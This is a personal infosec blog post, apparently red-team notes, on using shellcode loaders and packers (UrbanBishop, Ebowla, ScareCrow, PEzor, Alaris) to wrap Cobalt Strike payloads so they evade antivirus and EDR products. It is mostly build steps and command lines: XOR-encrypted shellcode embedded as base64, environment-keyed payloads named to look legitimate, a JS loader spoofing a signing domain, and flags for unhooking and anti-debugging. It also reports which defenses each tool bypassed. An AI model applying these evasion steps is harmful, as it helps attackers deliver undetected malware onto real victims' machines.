<!doctype html>
<html lang="en-us">
  <head>
    <title>Playing_with_payloads // fhlipZero.io</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.80.0" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="fhlipZero" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="/css/main.min.4ecfaf0fad326fd2372656e8f93c8e08fdf9cc68303b415113906ec014c50acd.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Playing_with_payloads"/>
<meta name="twitter:description" content="00_Intro I keep playing with different payloads as they come across twitter, they are usually good for a day or 2 max then Defender / everyone else starts catching it, figure I spent time playing with each of them so best to document it somewhere. Need to play with other general shellcode loaders and examples i have from the mr-un1kod3r course: https://github.com/Mr-Un1k0d3r/Shellcoding
urbanbishop ebowla scarecrow pezor alaris
urbanbishop https://github.com/slyd0g/UrbanBishopLocal
Super simple - git clone, make raw payload in cobalt strike, convert it, add it to the VS project and replace the XOR key, build for x64."/>

    <meta property="og:title" content="Playing_with_payloads" />
<meta property="og:description" content="00_Intro I keep playing with different payloads as they come across twitter, they are usually good for a day or 2 max then Defender / everyone else starts catching it, figure I spent time playing with each of them so best to document it somewhere. Need to play with other general shellcode loaders and examples i have from the mr-un1kod3r course: https://github.com/Mr-Un1k0d3r/Shellcoding
urbanbishop ebowla scarecrow pezor alaris
urbanbishop https://github.com/slyd0g/UrbanBishopLocal
Super simple - git clone, make raw payload in cobalt strike, convert it, add it to the VS project and replace the XOR key, build for x64." />
<meta property="og:type" content="article" />
<meta property="og:url" content="/posts/playing_with_payloads/" />
<meta property="article:published_time" content="2021-05-17T19:10:17-04:00" />
<meta property="article:modified_time" content="2021-05-17T19:10:17-04:00" />


  </head>
  <body>
    <header class="app-header">
      <a href=""><img class="app-header-avatar" src="/avatar.jpg" alt="fhlipZero" /></a>
      <h1>fhlipZero.io</h1>
      <p>Write ups and random notes on my adventures through InfoSec</p>
      <div class="app-header-social">
        
          <a target="_blank" href="https://twitter.com/fhlipZero" rel="noreferrer noopener"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-twitter">
  <title>twitter</title>
  <path d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z"></path>
</svg></a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">Playing_with_payloads</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          May 17, 2021
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          2 min read
        </div>
      </div>
    </header>
    <div class="post-content">
      <h3 id="00_intro">00_Intro</h3>
<p>I keep playing with different payloads as they come across twitter, they are usually good for a day or 2 max then Defender / everyone else starts catching it, figure I spent time playing with each of them so best to document it somewhere. Need to play with other general shellcode loaders and examples i have from the mr-un1kod3r course:  <a href="https://github.com/Mr-Un1k0d3r/Shellcoding">https://github.com/Mr-Un1k0d3r/Shellcoding</a></p>
<p>urbanbishop
ebowla
scarecrow
pezor
alaris</p>
<h3 id="urbanbishop">urbanbishop</h3>
<p><a href="https://github.com/slyd0g/UrbanBishopLocal">https://github.com/slyd0g/UrbanBishopLocal</a></p>
<p>Super simple - git clone, make raw payload in cobalt strike, convert it, add it to the VS project and replace the XOR key, build for x64.</p>
<p>Got past S1 but no luck with cr0wdstrike or defender</p>
<pre><code>[Convert]::ToBase64String([System.IO.File]::ReadAllBytes(&quot;$PSScriptRoot\encrypted_shellcode.bin&quot;)) | clip

</code></pre><ol>
<li>Copy base64 string into <code>Program.cs</code></li>
<li>Replace your XOR key within <code>Program.cs</code></li>
<li>Build the project for x64</li>
</ol>
<h3 id="ebowla">ebowla</h3>
<p>Oldie but a goodie
<a href="https://github.com/Genetic-Malware/Ebowla">https://github.com/Genetic-Malware/Ebowla</a></p>
<p>environment setup first due to kali python3 issues, stealing from <a href="https://www.kali.org/docs/general-use/using-eol-python-versions/">https://www.kali.org/docs/general-use/using-eol-python-versions/</a></p>
<pre><code>sudo apt install -y build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev xz-utils tk-dev libffi-dev liblzma-dev python3-openssl git

curl https://pyenv.run | bash

echo 'export PYENV\_ROOT=&quot;$HOME/.pyenv&quot;' &gt;&gt; ~/.zshrc
echo 'export PATH=&quot;$PYENV\_ROOT/bin:$PATH&quot;' &gt;&gt; ~/.zshrc
echo -e 'if command -v pyenv 1&gt;/dev/null 2&gt;&amp;1; then\n  eval &quot;$(pyenv init -)&quot;\nfi' &gt;&gt; ~/.zshrc
exec $SHELL
pyenv install 2.7.18
pyenv versions
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
python2 get-pip.py

</code></pre><p>Customize:
edit genetic.config</p>
<pre><code>
output_type = GO
clean_output = True
[[ENV_VAR]]
    windir = 'C:\Windows'

</code></pre><p>Build the payload with:</p>
<pre><code>./ebowla.py /path/to/shellcode genetic.config

./build_x64_go.sh output/generated_file something_legit.exe

</code></pre><h3 id="scarecrow">scarecrow</h3>
<p><a href="https://github.com/optiv/ScareCrow.git">https://github.com/optiv/ScareCrow.git</a></p>
<p>apt install openssl osslsigncode mingw-w64</p>
<pre><code>go get github.com/fatih/color
go get github.com/yeka/zip
go get github.com/josephspurrier/goversioninfo
</code></pre><p>go build ScareCrow.go</p>
<pre><code>./ScareCrow -I ./payload.bin -domain apple.com -Loader wscript -O scary.js
</code></pre><p>JS payload did pretty good running with &ldquo;wscript scary.js&rdquo;, have to watch and kill the wscript process if you need to run it again</p>
<p>this is the only one i&rsquo;ve tried so far but I&rsquo;ll update here as i play with others</p>
<h3 id="pezor">pezor</h3>
<p><a href="https://github.com/phra/PEzor.git">https://github.com/phra/PEzor.git</a></p>
<p>git clone <a href="https://github.com/phra/PEzor.git">https://github.com/phra/PEzor.git</a>
cd PEzor
sudo bash install.sh
bash PEzor.sh -h</p>
<pre><code>PEzor.sh -unhook -antidebug -text -self -sleep=120 artifact.exe -z 2
</code></pre><h3 id="alaris">alaris</h3>
<p><a href="https://github.com/cribdragg3r/Alaris">https://github.com/cribdragg3r/Alaris</a></p>
<p>pull it down on windows with python / vb studio installed</p>
<p>python.exe builder.py -s ./payload.bin -p p4ssw0rd -o .\</p>
<p>defender catches it so it needs more tweaking</p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
